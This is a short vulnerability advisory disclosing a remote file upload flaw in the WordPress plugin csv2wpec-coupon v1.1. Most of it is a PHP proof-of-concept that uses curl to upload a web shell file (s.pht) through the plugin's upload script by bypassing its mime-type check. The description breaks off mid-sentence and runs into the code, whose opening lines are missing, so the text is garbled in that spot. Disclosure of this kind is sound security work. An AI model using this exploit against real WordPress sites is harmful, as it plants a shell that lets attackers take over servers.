VDB-ID: 153 Title: Remote file upload vulnerability in wordpress plugin csv2wpec-coupon v1.1 Vulnerability Date: 2015-09-11 Download: https://wordpress.org/plugins/csv2wpec-coupon Vendor: https://profiles.wordpress.org/esclarmonde/ Notified: 0000-00-00 Vendor Contact: Description: Csv2WPeC Coupon provides an easy way to import and export WP e-Commerce Coupon items from and to a CSV file. Vulnerability: The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for "; $uploadfile="/var/www/s.pht"; $ch = curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> URL: http://www.vapidlabs.com/advisory.php?v=153 Credit: Larry W. Cashdollar, @_larry0